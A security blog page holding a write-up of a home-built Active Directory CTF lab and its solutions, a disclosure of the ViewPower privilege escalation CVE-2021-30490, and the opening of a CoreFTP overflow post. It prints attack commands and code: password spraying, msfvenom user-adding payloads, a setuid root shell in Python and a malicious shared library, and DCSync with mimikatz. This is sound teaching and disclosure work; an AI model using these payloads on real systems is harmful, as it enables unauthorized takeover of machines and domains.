0x90

2023 - 0xOPOSEC Summer Challange Extravaganza

Tue, 07 Nov 2023 00:01:00 +0000

0xOPOSEC Summer Challange Extravaganza

The last summer, in collaboration with the 0xOPOSEC Metup, we developed a CTF to be solved during the summer. The description of the environment and all the preparation is going to be shown in this article.

0xOPOSEC is a meetup around Oporto to gather and share security-related knowledge. It is a great experience to be on the lookout for new vectors and threats and to deepen the knowledge of the area.

With that in mind, it was proposed to create an environment where participants could enter and break the security of such machines at will to solve the challenges that they were presented with.

Preparation

Due to past incidents, we knew that it would be risky to expose such assets in an uncontrolled manner. Exposing vulnerable assets will most surely get us compromised and make us spend more money than we have available. For instance, the last time someone tried to expose a Domain Controller attackers tried to brute force every single password combination, and with that generated a lot of traffic, causing us to be billed more than we intended.

This is obviously undesired, so we decided to host everything behind a VPN. Now we are left with the design for the environment. We quickly noticed that provisioning 5 VMs over the whole summer would cost more than buying the hardware itself and hosting us ourselves. Down the line, we keep the hardware for later challenges.

It was settled! We would buy stuff, keep it a secret from our wives, and hope she couldn’t tell by the noise of the server that we were hosting a complete CTF from our Home office =D.

The CTF would be mainly Windows-based since all other challenges were Web-based and we wanted to do something different so everyone can learn something new and call us names when stuff doesn’t work the first time.

Hardware

To keep the secret from our ladies we needed to have a discrete server. Luckily nowadays there are several alternatives to do so.

We could look at Raspberry PIs but since our environment would be primarily Windows-based (more on that later) it wouldn’t work. It doesn’t even have the necessary hardware requirements to virtualize all the necessary servers that we intended.

We took the opportunity to look at Micro Workstations such as the HP HPE ProLiant MicroServe, Dell OptiPlex 3070 Micro, and ThinkCentre M710q. Big shout out to project miniMicro from Server the home where he showcased all “Micro Architecture” (They are actually called SFF or Small Form Factor Computers) PCs that help us choose one to our needs!

However those are quiet, great-looking machines, but they are still expensive. At the time, before the massive increase in prices, we were looking at 1000+ euros for a new machine, so we decided to look at the used marked in stores such as BackMarket or OLX. Luckily we were able to get a ThinkCentre for 350 euros (At that time, prices have changed considerably)! It’s not great but it is the start of something.

We knew that the specs were not going to be sufficient, we had a 128Gb NVME SSD, an Intel I5-10500M CPU, and only 8Gb of RAM. But the hardware allows for great expansion. We scraped some parts from the old bin and found an additional 250GB SSD we proceeded to order an additional 8Gb SODIMM stick and a 1TB NVME SSD (Storage was going to be an issue with Machines).

To virtualize everything the obvious choice was Proxmox Virtual Environment. It offers enterprise-grade solutions for free. You don’t have any support but looking forward to working with templates, replications, clusters, and storage is far easier to

So, in short, we were left out with the following specs:

Intel I5-10500M CPU
16GB of RAM
Storage
- 128GB NVME SSD (OS)
- 250GB SSD
- 1TB NVME SSD (For Good Luck)
Proxmox Virtualization Server (OS)

Network

As stated we shouldn’t expose vulnerable assets to the Internet. This could bring unwanted attention to our address and it would prevent legit players from interacting with the lab.

With that consideration in mind, we needed to create a VPN for players to play at will. This brings several requirements to the lab.

Since this was a home connection, proper segregation and segmentation should exist in the lab itself. Only VPN client connections should be able to connect to the lab.

Furthermore, no outbound connections should be allowed. This will prevent users with malicious intentions from pivoting on the lab as a proxy to attack other Internet services. We should be liable in maintaining the lab only playable with the learning intent, and not as a pivot point to attack other networks. This brings a huge downside: no reverse shells are possible on the Internet. We also wanted to block connections to the VPN Clients themselves that did not originate from the clients. Why? Again, to avoid pivoting into the lab and reaching other VPN clients, blocking their “fun”. In other words… no reverse shell for you! Bind shells are OK though.

The lab should be easily reachable once the user has VPN access (one single segment to start should be enough to simulate one badly configured network).

With all these considerations in mind we decided that we needed a firewall to easily manage all rules and VPN access to clients.

Luckily, once again we were blessed with the marvelous Netgate 2100 with pfSense+ software to configure all these requirements and to take the hit with all the connections. Previous tests were conducted and we could manage 15 concurrent connections performing scans with bandwidth and processing power to spare! (We will take a look at all configurations in just a bit, we went a bit crazy with the security settings).

Networks

There are essentially two networks:

One for VPN clients - 192.168.211.0/24;
One for the lab itself - 192.168.111.0/24.

Only two networks were chosen to keep the challenge easy for newcomers.

There are some considerations we need to take into account while creating these networks. There should be enough IP space for clients. These clients cannot initiate communications with each other (to keep players as secure as possible).

The LAB network itself should be as segregated as possible, for instance, it should not be possible to initiate a connection to the VPN Client’s network. This is problematic since players wouldn’t get reverse shells, however, this also enhances the security of players where a machine cannot be used as a pivot to attack real clients. Furthermore, some payloads would keep pinging back a certain IP until it replies. If the player changes the IP with someone else, the third party would receive a connection for free, defeating the purpose of the exercise.

With these requirements in mind, we start building some Firewall Rules.

Network Rules

In this section, we will take a look at how to deploy certain network Firewall rules to create the environment.

There are several security considerations we need to take into account to protect the environment. Remember how pfSense processes the network rules. We need to take a stance in understanding that we control the packet when the packet reaches the network interface at the pfSense (very similar to how AWS and Azure work). This can be problematic in Layer 2 switching (local network) rules, however, not the case for us. We can be worrisome since, for all intents and matters clients share the same L2 segment, however, since they are remote clients the package will be processed in the interface itself and we can control what flows are or aren’t allowed.

Building correct network rules is “easy”. You allow what you know and block everything else.

If you try to block the things that you know, believe me, someone else will know something that you don’t and will leverage that, so try to avoid this option.

Client Network

This is the simplest network Rule. We will allow only the target network, with a caveat! We can, and should block the management interface of pfSense on that interface. It is not part of the exercise and people inevitably will try to attack it even though they are told not to.

So we created two rules to block IPs from reaching the Gateways (one for the Lab, and another for the VPN Client Network).

We enable clients to reach the whole LAB network. And just for the sake of visibility, we created a “Deny All” rule. If no rule is matched the firewall, by default, blocks all traffic but with this rule, we gain visibility on who is trying to reach the Internet or other network using this VPN.

This essentially denies Internet access by the player, however, as you’ll see in the VPN configuration that this is a split tunnel VPN, meaning that it is not going to reroute all traffic through it, just the traffic destined to the target network.

The most keen-eyed of you might noticed that we haven’t blocked reaching other players’ IPs. This is done at the configuration of the VPN server itself and you will look at it later on the VPN configuration.

Lab Network

These rules could be simplified to “Deny All” correct? Well yes, but that would be a pain to manage. In preparing the environment we needed to update machines, but even with that, we did not want to reach private networks (just give Internet access). To accomplish that we created several rules to block the RFC1918, and later we allowed Internet access.

If you noticed the first rule blocks everything reaching the network. This achieves nothing because the processing of the VPN client’s connections is done at the VPN interface so the traffic is still routed. Meaning that if the traffic is internally routed (routing on a stick) then it would be allowed. If we want to block traffic it needs to be closer to the source, almost at the egress/outbound level of the interface. It also makes sense to do so, since we have more control at the source we avoid resource exhaustion/link usage for packets that would later be dropped.

Certificate Authority

In order to proceed with the VPN access we need to create a Certificate Authority (CA) this will ensure that communications are secured for the VPN and for all supporting services such as firewall management and virtualization environment (we do not want people intercepting sensitive credentials in case of a major compromise).

We decided to use the Firewall CA engine to do that, yes, we are centralizing a lot of services on the firewall, but if we paid for the whole firewall we are going to use the whole firewall!

To create one is easy, we just go to System->Cert. Manager.

We then created a new CA, because we are going to change the Certificate of the firewall itself (so we know we are connecting to a trusted website). Just click “+Add”.

We fill everything accordingly. We choose an RSA key of 8192 bits and a SHA512 digest algorithm. This might be excessive but my opinion is that, with the hardware acceleration in place, this would be a great compromise between security and convenience. Luckily the HW handles all of this just fine.

Create the CA and go to the “Certificates” tab. In there, we can manage all certificates, and even create new ones.

We need to create certificates for users, for the firewall, and for the Proxmox environment.

We just create each one by pressing the “Add button and filling in every field respectively.

Yes, we chose the same entropy and algorithms for the cert (the expiration date is less than one year, otherwise some clients will raise errors though). But for a simple CA, we should be OK (TM).

Lastly, we export the CA public certificate and add it to our machine. We can extract the public CA file in the CA section of the pfSense configuration as shown in the picture:

Add the CA to your Operating System/Browser and every site that presents a certificate signed by that CA will be trusted.

If you don’t know how to do this I recommend this and this website (it worked for me).

And now we can concentrate on creating the VPN with that new CA!

VPN

Finally, we are going to give users access to our environment in a somewhat controlled way!

For that, we need to create a VPN Server. We established that we are going to use the Firewall to act as a VPN concentrator (makes sense). To simplify things we are going to use OpenVPN. We could have chosen a different application but it seems good enough for the intended purpose.

For that, we went to VPN->OpenVPN on the pfSense administrative board, and on the Server Tab we created a new service:

We hit a struggle for this one. We don’t want to use a local user database for the connection. We wanted to keep authentication separately. The reasons for that are twofold:

We don’t want to give access to the pfSense management interface - However that can be fixed as a group on its configuration;
There are other VPN services running on the Firewall, allowing a local user access to other VPN instances since the way OpenVPN works here is to share the same key across multiple instances to allow for inbound connections.

For that, we needed to create an authentication service. Luckily we already had a virtualization environment so we just created an LXDC container running FreeRadius for this authentication. (It was just literally just installing Freeradius, setting a shared secret, and creating one user there) on a completely different network to ensure segregation of duties and prevent people from attacking it.

We then needed to add an authentication provider in pfSense. For that, we to “System->User Management” and Selected the “Authentication Servers” section. Add one and configure accordingly.

Going back to the VPN configuration.

After that, we follow by filling in every piece of information needed for the service:

Server Mode was set to “Remote Access(SSL/TLS+User Auth), this allows us to reject connections that have the incorrect user certificate and a valid user+password combination for reasons previously stated.

We chose the new backend authentication that was just created.

Select a “tun - Layer 3 Tunnel Mode”. To avoid headaches in some Operating Systems that don’t like Layer 2.

The rest of the configurations were left as standard, apart from the cipher suites configuration of the server:

On the Tunnel Section, we created the new network 192.168.211.0/24 and noticed the unmarked boxes to force the traffic to be redirected through the tunnel? This is what we call a split tunnel, so we need to configure what Local Networks can reach this server in the “IPv4 Local network(s)” declaration and we set the Lab Network for that effect 192.168.111.0/24.

Since the access will be shared by players we need to set the box at “Duplicate Connection” as made to “Allow multiple concurrent connections from the same user”.

Lastly, on client settings, we set as a /30 for each client to isolate them the most:

And we are done! I won’t divulge in how to set port forwarding on your ISP router but if you got this far, it should be an easy endeavor for you to take.

Virtualized environment

For the Virtualization environment, we choose Proxmox. It is easy to use and free with enterprise features.

To ensure isolation of the environment we created a specific VLAN for management. All traffic needs to be tagged for the VLANs to work, and they are tagged in the creation of the VM/Container. This means that in case someone forgets to add a VLAN to the VirtualMachine it will enter the BlackHole VLAN and all traffic dropped.

For this to be achieved we need to:

Set up the VLAN on the firewall (and switch if you have one);
Set up the Proxmox Interface to work.

Set up pfSense

Due to its nature and the use of the SoC in pfSense some adjustments need to be made. If you go to “Interfaces->Switches” on your pfSense and select the VLAN section you can create new VLANs.

Make sure the 802.1q is enabled! and click “Add tag”.

Now this is the tricky part. You need to set up a VLAN ID (you can choose yours), and you need to add the port where you are going to connect your server.

However, you also need to add the WAN interface! Otherwise you won’t get any packets flowing. Mark both members as “Tagged”!

In this example the PVE is connected to port 4 and the WAN is connected to port 5.

We are not done! Create a new member and lets add our BlackHole VLAN (to *avoid connecting to our internal network).

Select a new VLAN ID (I used the last available so it doesn’t get in the way) and select your port. In my case, it was port 4 without tagging. This configuration will make as if no tagg was added, it will fall back into the blackhole VLAN and no connectivity is allowed.

Now add the last VLAN for our Lab itself! follow the same procedure: assign a new VLAN ID and choose the port where you will connect Proxmox and the WAN port.

Make sure to remove the for in your table as the systems default VLAN:

And we are done!

Set up Proxmox

Having the pfSense set up, it’s time to configure our server’s network. The intent is to have the management interface in one VLAN and configure the remaining traffic to flow as is. We will configure the VLAN tag in the resource itself. If someone tags a VLAN that is not ours, then the traffic will go nowhere since only allowed tags are permitted in the pfSense (as previously configured).

To achieve that we need a terminal. When you are installing Proxmox it’s easy to do this since you change the management interface because of the network change. In the file /etc/network/interfaces setup the VLAN as follows:

#Loopback interface, we don't care
iface lo inet loopback 

#This is the physical interface for the VM, set it to manual 
iface eno1 inet manual

#This is the virtual interface for the Management VLAN. You need to create this in order to set up the IP for the management console
iface eno1.<REDACTED VLAN ID> inet manual

After that block of code, comes the initialization of the interfaces to be persistent across reboots:

Set up the Interface with the VLAN
auto vmbr0v<REDACTED VLAN ID>
iface vmbr0v<REDACTED VLAN ID> inet static
        address 192.168.<REDACTED CIDR>
        gateway 192.168.<REDACTED>
        #You need to set up the bridge between this virtual interface and the tagged interface connected to the physical interface
        bridge-ports eno1.<REDACTED>
        bridge-stp off
        bridge-fd 0

#Setting up the virtual interface with the parent of the physical interface
auto vmbr0
iface vmbr0 inet manual
        bridge-ports eno1
        bridge-stp off
        bridge-fd 0

And now, with access to the management console, we can create resources that are VLAN tagged! When creating a new VM or container just make sure to specify the tag that you want. With this configuration all traffic that comes out of the resource will be tagged and in the correct network (so we don’t allow VLAN hopping).

And now we create a bunch of VMs!

All machines

Machine	vCPU	Memory (GB)	IP address
LAB-DC	2	1	192.168.111.26
LAB-SHARE	2	1	192.168.111.30
LAB-MGMT	2	1	192.168.111.36
LAB-WIN6	2	2	192.168.111.41
LAB-WIN7	2	2	192.168.111.42
LAB-LIN1	2	1	192.168.111.31
LAB-LIN2	2	1	192.168.111.34

These are the machines at play and their respective configurations. All Windows-based machines were based on a Windows 2016 Server Datacenter edition.

Linux machines were based on the Ubuntu Server 22.04 image.

We decided to create two templates (to save space and time): Windows and Linux. We then created all machines using those templates.

For Windows machines, we needed to run the sysprep command before joining into the domain, since the SIDs would be the same and will conflict with already joined machines.

Later we would run a set of scripts to provision the environment.

Bear in mind that some GPOs needed to be created to disable Antivirus account lockouts, enable anonymous SID, disable the firewall, and even block the rotation of machine account passwords. This was decided to make the challenge easier for players so they could learn from a poorly implemented domain.

Linux was easier: provision the machine, run the scripts and that’s it.

Write-UP

The intent of the CTF was to follow the illustrated path. After the initial access, several challenges were presented until the user could compromise the entire domain and all machines.

Challenge - Larapios Group Access

Larapios Group states that they have access to our core infrastructure!
They claim that our security is lacking and have credentials to access our systems.
Quickly, grab the access and gain access to one of the internal machines!
(...)
Note: There are several accounts possible, due to the RDP nature only one person at a time can use one account. If it fails, use a similar account

You are offered an OpenVPN configuration file and a set of credentials. You can quickly notice the route pushed to your machine. This suggests that’s the correct network. To make this easier we disclose the target network so the player doesn’t attack other networks.

Since ICMP was not allowed in the network (as you can see in the network rules) only TCP and UDP were allowed, we need to scan the network with a different option in nmap. For instance, we could disable the alive check altogether with -Pn.

One command example is as follows: nmap 192.168.111.0/24 -Pn --open -sC

This command not only will enumerate all machines, but it will run basic enumeration scripts on nmap. You’ll notice that the environment was fairly based on Active Directory and you could get the domain name: BAJORDAS.local.

One of the basic things I like to do in those environments is to look up open shares. Several times companies open shares too wide believing that they are only internal networks and disclose sensitive information there. If the player uses the script smb-enum-shares it could see that there is one machine LAB-SHARE (the name almost implies it) that has open shares.

With this information, we can just simply connect to the share and retrieve files.

Using impackets’ smbclient is quick and easy to connect and dump the information impacket-smbclient Guest@192.168.111.30.

And by browsing the share you’ll get a script with a user sedalfino.freitas.

Now, with the user, we can spray the entire domain and check if it has any access. You can use for instance crackmapexec for that, however, it will only verify either if the credential is true or if it’s an administrator. To check for RDP access you need to pass the correct module to crackmapexec or use a different tool. One suggestion was to use crowbar such as: crowbar -b rdp -s 192.168.111.0/24 -u sedalfino.freitas -c Summer2022.

This will spray the credential through the entire domain and luckily you’ll get one hit

Looks like that user has RDP access to LAB-WIN6! Using a simple client such as Remmina you could connect to the machine and get the first flag:

flag{OneSmallFootInTheEnterprise}

Challenge - Stairway to Heaven!

Larapios Group states that they can completely compromise the machine and gain Administrator access through a misconfiguration!

Cement your access by replicating this and get your points!

Now that you have a machine you can try and privesc. If you use some helper script such as PowerUP.ps1 or WinPEAS you’ll notice that two registry keys are installed that allow the installation of programs in an elevated context. You can use msfvenom to create a malicious installer and abuse this to obtain Administrative privileges!

You can use payloads such as msfvenom -p windows/adduser USER=cenas PASSWORD=P@ssw0rd132!" -f msi -o file.msi to create the payload. Since this is an MSI and it will install something, windows, with this configuration, will automatically install using an elevated prompt. But since we injected that payload, a new user will be created.

One of the problems was to upload such detection files there (WinPEAS or PowerUp) since no Internet connection was available. One interesting feature of RDP and Windows is the ability to mount remote folders or drives on the server. In remmina configuration you just need to specify the “Share folder” and it will mount as a remote volume:

After running the installation and pwning the machine we can connect with the new user and get the privileged flag:

flag{wholeLegInTheEnterprise}

Other OS Are People 2 & Shells, Shells, Shells

Larapios said there are some Linux machines loose in the environment and the System Administrator reuses their credentials 😩.

There is more than one Linux OS server. Can you find it in the network and access it using your *repertoire* of pwned passwords?

But we are not done yet! When you compromise a Windows machine, one of the first things you do is dump secrets such as the LSASS process. In that process lies hashes and sometimes passwords that users who connect to the machine use or services of the same machine.

If you use mimikatz to dump these secrets you’ll get a new credential to use bacano.do.it!

Following the same strategy we needed to scan the environment to see where those credentials are being used.

One caveat is that these would be used on SSH connections and no RDP/SMB connections. This credential is used on the two Linux machines.

Only for using that credential, you are greeted with two flags:

flag{pinguinsRPeople2}

flag{OneMore4TheRoad}

Challenge - CAPtain Pwn!

The System Administrator was having trouble getting scripts to run but found a way to always work!
Can you abuse the misconfiguration and pwn the machine?

After you get the easy flag you’ll need to compromise the machine. To do that we can use another helper script, such as LINPEAS. In the plethora of information, you’ll notice a warning for a privesc.

The title of the challenge resembles CAP, from capabilities, Linux Capabilities and we have a lot of them to explore (i.e. from hacktricks).

We can see that Python has the capability to set the UID of the running program. This means we can control what the user is running. A simple payload in Python to change the current user can be used to escalate privileges:

import os;
os.setuid(0);
os.system("/bin/bash");

flag{HelloCAPtain}

Challenge - SO Cute!

Infrastructure logs show weird behavior on one binary left in the server but we couldn't discover how can we abuse it to render the server to its knees. Everything is patched so there will be a challenge.

Can you analyze the server and look for ways to overcome its security?

Following the same principle you can run linpeas in this environment to look for interesting files and privileges.

Down the rabbit hole, you should see a strange binary that has the SETUID flag set.

That permission allows the binary to act as a privileged user. Some binaries are standard on a system, for instance, the ping or unix_chpwd tool can be executed by anyone even though by nature it requires additional privileges.

For that kind of binary, we should guarantee that there is one way to inject code or change the execution flow by an outside party.

If we can manipulate the flow, we can impersonate the binary owner, in this case, root.

The binary magician is not very common and does not belong to the standard setuid binary list.

If you execute the binary without any arguments you should see a string Infosec Magic, definitely not standard.

We can try and fiddle around with the binary or just open Ghidra and try to reverse it.

I opt for a different strategy and use strace to look for system calls that the application makes to understand how can I abuse it.

If you pass two arguments you can see that it tries to open some files (yes, this you might see easily on ghidra by reverse engineering the main function). You are then greeted with the message “Error Loading lib!”. This message is a hint to libraries, similar to DDLs on Windows. If you dig deeper you will see that it is trying to load a .so file.

Similarly to DLLs, these are libraries imported to the program and if a program is trying to load one and you control the folder where it tries to run you can create a malicious library that will take control of the execution flow and impersonate the setuid binary privileges.

To do that you need to create a standard library as such:

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int _init(){
        setgid(0);
        setuid(0);

        execve("/bin/sh", NULL, NULL);
        return 0;
}

Take particular notice of the method name. It is not the standard main function. If you use main it will not run when it is loaded, therefore you should use _init and an entry point since it will get called to construct the library and gain execution.

to finish you need to compile the library, as a library!. Otherwise, it will complain that you don’t have the proper entry point.

To do that you just simply use:

gcc <file> -shared -o <name_of_the_compiled_file> -fPIC -nostartfiles

Pass the file to the function and you’ll see that you are now impersonating root and the box is owned!

flag{YouAreSOwelcome}

Spread your hacks

You got in? Noice!
I heard they got a special machine for "Important People", but they are not very security-focused and their automation is faulty. Can you access it?

Now you need to take a step back and reassess what you have. It is a good moment to look at the Active Directory and with the credentials that we have try to understand how the environment was built.

There are several ways to achieve that depending on your preference.

I am very fond of using old tools to achieve new objectives, for instance, I like to use ADExplorer from SysInternals tools to explore the Active Directory.

I prefer this tool to avoid the fallacy of trusting too much on a tool such as BloodHound.

Don’t take me wrong, BloodHound is a very good tool to detect paths of privilege escalation in the environment although it can leave out some interesting vectors for instance: you often want to go from a standard user to a Domain Admin, but you might not need that, if a user can reset other peoples’ passwords that is also a security problem and if you don’t take your query seriously you will leave those problems without being noticed. There are sensitive groups far beyond Domain Admins alike.

Perhaps you can see Bloodhound as a good way to start cleaning your Active Directory and later go deep with ADExplorer to create additional rules to clean the environment.

But I digress. Running ADExplorer we can examine almost all accounts. Being careful looking up all accounts we notice a small comment in the Active Directory Description:

And we got a new account compromised! We could take crowbar or even crackmapexec to scan the whole environment for RDP access and lo and behold we get access to the LAB-WIN7 machine.

After scanning the machine we can quickly obtain the new flag and a new README file that we will look at later.

flag{slowMovingRabbit}

Big Dollar Spender

You in? Nice! Can you pwn it? Maybe...

They installed some shady service and hammered things down to make it work. Maybe it can be exploited in your favour.

We need to push forward and try to escalate privileges in this machine. With the description, someone can infer that this is relatable to services being run. Using PowerUp we scan for privesc opportunities and one comes up:

One service Bajordas Champion of the World stands out. It is not a standard Windows service (obviously) and it has lax permissions such that a standard user can modify it.

We can invoke the abuse function and it will create a malicious binary to add a new administrator account that we can later use.

After that, we can start the service. It will fail since the service would exit but our payload runs successfully, and we have an administrator account. We can collect the new flag and move along in the challenge!

flag{GameON}

Congratulations You Are Being Backed Up, Do Not Resist

It seems Larapios Group achieved some level of persistence in a Management machine left in the environment but the normal compliance scans do not detect it?

It seems they are leaking information from the machine seamlessly, almost like a **backup**. I don't know, maybe it's Microsoft Active Directory black Magic.

Can you replicate the attack and gain access to the flag they left?

We need to trace back and go to our second Windows machine (LAB-WIN7). There was a README file on the desktop with the to use the printer using the account > impressora with PrintSvcFTW! text.

Well, we have an additional account. Now if we run Bloodhound or just try to spam all the other machines with the standard password spray you will get a new hit on a new folder to inspect!

The file server LAB-SHARE01 has a hidden share called Admins$ (Similar to the standard Admin$ share but with an additional character to it blends in) where you can find the following text:

Se algo falhar usa isto do arco da velha, assim os admins nem compliance descobre ;)

PanadosComPaoChouricoChouricao1337!

which translating means:

If anything fails to use this from arco da velha, therefore neither admins nor compliance find it ;)

PanadosComPaoChouricoChouricao1337!

Well there is indeed an account named arco.da.velha and we can verify that that password is indeed the correct one, but it doesn’t give you access to other machines. Let’s hold progress with this account for a bit longer.

You might also find that the account printer allows you to browse certain files in the WIN-MGMT machine. That was an unintended consequence of the Backup Operator permission. The intent was for the people to impersonate the account, activate the permission, and browse files to reach the flag flag{ItsNotALeakItsASurpriseBackup} stating that there is no Admin flag on the machine.

My Momma Said I Could by Anything, so I Became a Domain Controller

It's OK, there are no weird domain admins in the group!
We are compliant, no one can access the domain controller. We are secure... or are we?
Larapios group can still dump all our environment, what is happening? 😱😨

Going out of options we look at the arco.da.velha account and we look at what permissions are we able to gather from it. If you manage to check the permissions of the DC itself you can observe that that account is able to perform a DCSync.

DCSync is, in the lamest terms, the synchronization of Domain Controllers. This means that we can use the account to make ourselves a Domain Controller and replicate everything to us. This means all the accounts, computer accounts, everything…

So we fire up mimikatz/Metasploit/whatever to attack and get all the accounts. However, we don’t get any passwords, just hashes.

Now we can divide our approach here, we can pass the hash to the Domain Controller or any other machine, crack said passwords, or even Use the golden ticket to impersonate whoever we want. I won’t go into details since Hacktricks made such a great tutorial on how to perform each attack.

After you get the DC flag flag{PwnadosComPao} you are not done yet :).

All Your Files Belong to Us

Larapios Group left flags on all machines, tracing back your steps, is something missing?
Own Everything and Everyone!

Using the administrator credentials you are able to compromise the whole domain. If you go back to the WIN-SHARE machine you will see a new flag flag{niceFindNeo} on the root of the C:\ drive, thus concluding the CTF!

Essentially the following image shows how someone would do the whole CTF:

Conclusion and next steps

Although very complete this scenario was not without troubles. We built the environment with a severe degree of lack of resources, being on RAM or disk itself. The main problem was updating the images. If you read everything you will notice that we did not exploit any vulnerable software by itself, we compromised almost everything with misconfigurations or unwanted leaks that we found across all machines. When at first we were provisioning the environment we updated everything as best as possible, thinking that we shouldn’t be too far off since it was the newest image on Microsoft Download Center. Oh Boy were we wrong!

We lack the updates from one year ago (more or less) and when we went live with the environment one challenge exploited the DC directly abusing the ZeroLogon vulnerability and warn us about it. Thank you @comet!

After a very quick investigation of the logs we noticed that the service crashed while updating due to the lack of space in the server itself (we only allocated 20GB, in my day it was top of the line… I’m old). We expanded to 25GB and the update was then successful. Live and learn, live and learn. The most annoying thing was that Windows Update reported that “Everything was updated” which was a blunt lie.

Luckily we had snapshots of everything… That was our second hurdle. We quickly roll back to the well-known good configuration to perform expansion of the disk and update it as fast as we can. However, we did not disable the rotation of the managed service accounts in our Active Directory, meaning that from time to time, depending on the configuration, some machine accounts rotate their password. This is an automatic process to provide additional security in case the computer account/managed service account key is compromised. However, if we roll back to a base image, most likely it will not have the newer keys and we can’t connect back to the domain. There are ways to fix this: rejoining the domain or resetting the active directory machine account password on both ends. So crisis averted but to be kept in mind. Important note: I know that at the beginning I said that it was important to disable this… I forgot about it.

This got me thinking.. humm I should invest in a central configuration management tool to automate all configurations if I need to recover the environment. Perhaps the next one.

One thing that was completely missing was the collection of Security Events. We had no SIEM in place and it would be interesting to know what kind of techniques people were using at the moment and understand what improvements we could have made in our scenario.

We couldn’t do it since we lack the storage and RAM space to even have a Wazuh or Elastic Stack Security Solution.

Apart from that, the adventure continues. Thank you for your help in the creation and testing of the challenges @vibrio. Hope to prepare the next one!

Privilege Escalation on ViewPower - CVE-2021-30490

Sun, 16 Aug 2020 00:01:00 +0000

Privilege Escalation on ViewPower - CVE-2021-30490

Lockdown over. Today I am going to present one of the most basic forms of privilege escalation on Windows Systems. This is nothing new.

PowerView is software that helps you manage your UPS. It allows one to view the state of the battery and control some of the most basic functions. It is recommended by some UPS manufacturers such as Phasak. Unfortunately, it didn’t work for my model so I decided to investigate how it was configured.

A bit about Windows permissions

Similar to Linux, Windows offers a set of permissions on objects. These permissions can be applied to several instances, for example, the well-known files, registry keys, Active Directory Objects, …

Permissions follow the Discretionary Access Control List (DACL) principle. More can be found at https://docs.microsoft.com/en-us/windows/win32/secauthz/dacls-and-aces.

The DACL is composed of one or more Access Control Entries (ACE). That entry states if a user can or cannot access the resource.

Sometimes the effective permissions on a resource need to be calculated (https://networkencyclopedia.com/effective-permissions). This can happen when you have a large group, but you want to restrict access to one user in particular.

Permissions do not only refer to READ, WRITE, or Execute in Windows. There are several special permissions that, in certain conditions, can yield the same, or similar, effects (https://docs.microsoft.com/en-us/archive/msdn-magazine/2008/november/access-control-understanding-windows-file-and-registry-permissions).

These permissions can be great to grant them granularly to users. However, some administrators just blatantly use the Full Control permission set (you can’t have privilege escalation if you are already an administrator 😎).

Each entry needs a Service Principle. This often relates to a user, group, service account, or a “Special User”. For instance, the user Everyone relates to the implied name, everyone, being authenticated or unauthenticated users. Anyone can access the resource. The principle Guest relates to the guest user. The principle NT Authority/Authenticated Users refers to all authenticated users, which means no Guests.

Often you see the user Everyone one shares so anyone can access, instead of Domain Users a group where every user of the active domain resides.

When nothing works, a lousy system administrator tends to give all the permissions and, since it works, nobody touches it, otherwise, people get mad.

Lastly, you need to Allow or Deny the permission.

In essence, this is what it takes to create an ACE.

Exploiting it (CVE-2021-30490)

Since a program to work, inherently installs files, the permissions need to be set. The ViewPower application runs as a service. It starts with the computer and runs in the background monitoring your application.

In Windows, typically a service runs with a high level of privilege such as NT Authority/System. You can later drop down the permissions that you run to a lower privilege.. but who has the time right? It is often seen that services tend to not change this configuration.

The service points to usually an entry point. A file to be executed. Since that file is going to be run as a service, with the highest permissions (usually), it is paramount that nothing with low privilege access can tamper with that file.

This is exactly what is present in this demonstration. I said nothing new was going to be learnt today and I stand by it. One of the most simple Windows privilege escalations is to look at all the services running on the machine and check if any of the callee files have loose permissions that might allow a user to escalate to NT Authority/System, since it is running with that account.

You can do this by looking at the file location in the service list and using the icacls command:

Open the execute dialog and type services.msc.

Now search for the service you want to inspect and double click on it. In our case, it is called upsMonitor or upsProMonitor:

Locate the Path to Executable and copy it. Now open a PowerShell or Command Prompt and paste it to the icacls command.

You can see four entries. The first three are quite standard. The last one gives modifiable access to NT Authority/Authenticated Users. This means that any authenticated user can modify the binary. So in theory we can modify the file to execute our own code, for instance, a reverse shell or a privileged command.

You can also use the PowerView PowerShell script to automate this task (don’t confuse it with the software at hand) using the Get-ModifiableServiceFile call (https://powersploit.readthedocs.io/en/latest/Privesc/Get-ModifiableServiceFile/).

For instance, you can use the command net group “Administrators” <current username> to an Executable file. And the user is magically an Administrator.

There are two downsides: You need to restart the service for it to take effect. Nothing that a reboot can handle, if you have a local session on the computer. The file can not be open to performing this, you can try and kill it on some occasions. I believe this was done to give a standard user access to controlling the application.

You can use msfvenom to create an executable file with the command to be executed, for instance:

msfvenom -a x86 –platform Windows -p windows/exec CMD=”net user johnny john /add” -f exe > upsMonitorPro.exe

After copying to the destination folder you can then restart the service or reboot the computer to take effect.

If you restart the service you will get an error message stating that the service was not able to initialize. This is because we just created an executable file that exited, but the code was run!

If you go to Computer Management->Users you will notice the newly created account. We can add ourselves to the Administrator group or any other action we want. The sky is the limit now.

Both the ViewPower standard and the Pro version are affected by this vulnerability. The professional version adds more services that suffer from this such as:

upsProMonitor
upsProMySQL
upsProTomcat

You just need to pick one and exploit it to escalate privileges.

A refinement of these permissions should be done to mitigate and/or fix the issue, however, standard installations are vulnerable to this.

Note that all this was done on an unpriviledged user.

Impact

This vulnerability allows for an unprivileged user to escalate privileges and gain an Administrator or NT Authority/System set of rights. Exploitation is trivial.

Disclosure

This vulnerability follows the responsible disclosure standard, as usual.

Affected software: ViewPower and ViewPowerPro versions V1.04-21012 (other versions might be vulnerable)

Download Link (This version was removed from the Website):

ViewPower Pro - V1.04-21012

ViewPower - V1.04-21012

ViewPower (Windows XP) - V1.04-21012

“Official” Website (Others might exist but this is was the one tested): https://www.power-software-download.com/viewpower.html

Tested on:

Windows 10 Version 20H2 OS Build 19042.928

Final note

AAt the time of disclosure, I recheck if the new version available on the official Website was fixed. It is not. the problem remains on the latest Windows 10 Installation (although this has nothing to do with the software problem) and the latest available version (from 15/08/2022) V1.04-21353.

The new version is also available as a mirror here

Timeline

11/04/2021 - Vulnerability discovery, CVE-2021-30490
26/09/2021 - Couldn’t possibly find a manufacturer, so I contacted a bunch of implementers. There was no email on the official page.
27/09/2021 - Details to implementers sent
27/10/2021 - Status request
03/11/2021 - Still pending
15/08/2022 - Disclosing it

Unauthenticated Remote Code Execution/DoS on CoreFTP Server - CVE-2020-19596/CVE-2020-19595

Sun, 16 Aug 2020 00:01:00 +0000

Unauthenticated Remote Code Execution/DoS on CoreFTP Server - CVE-2020-19596/CVE-2020-19595

Well hello there, hope everyone is doing well on this lockdown. As with many people, I start learning some new tricks, and I went old school on this one. Due to the excess time, we had to play with another thing I started looking again for old school exploits such as Buffer Overflows. Well, it didn’t take long to find one.

